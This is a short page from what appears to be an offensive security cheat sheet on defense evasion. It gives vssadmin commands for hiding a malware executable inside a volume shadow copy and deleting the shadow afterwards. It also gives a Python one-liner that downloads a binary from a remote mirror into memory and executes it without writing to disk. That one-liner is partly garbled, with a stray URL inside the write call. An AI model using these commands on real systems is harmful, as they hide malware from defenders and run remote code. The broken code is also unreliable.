4.1-Defense-Evasion.md

4.1 Defense Evasion

Table of Contents

• Hide Malware by using Volume Shadow Copy

Hide Malware using Volume Shadow Copy

C:\> vssadmin create shadow /for=c:
C:\> vssadmin list shadows
C:\> \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\<FILE>.exe
C:\> vssadmin delete shadows /shadow=<ID>

Running Binaries without touching Disk

$ python3 -c 'import os; import urllib.request; d = urllib.request.urlopen("https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap?raw=true"); fd = os.memfd_create("foo"); os.write(fd, http://d.read()); p = f"/proc/self/fd/{fd}"; os.execve(p, [p, "-h"],{})'

Previous

• 4 Exploitation

Next

• 4.2 Credential Dumping
• 4.3 Privilege Escalation
• 4.4 Lateral Movement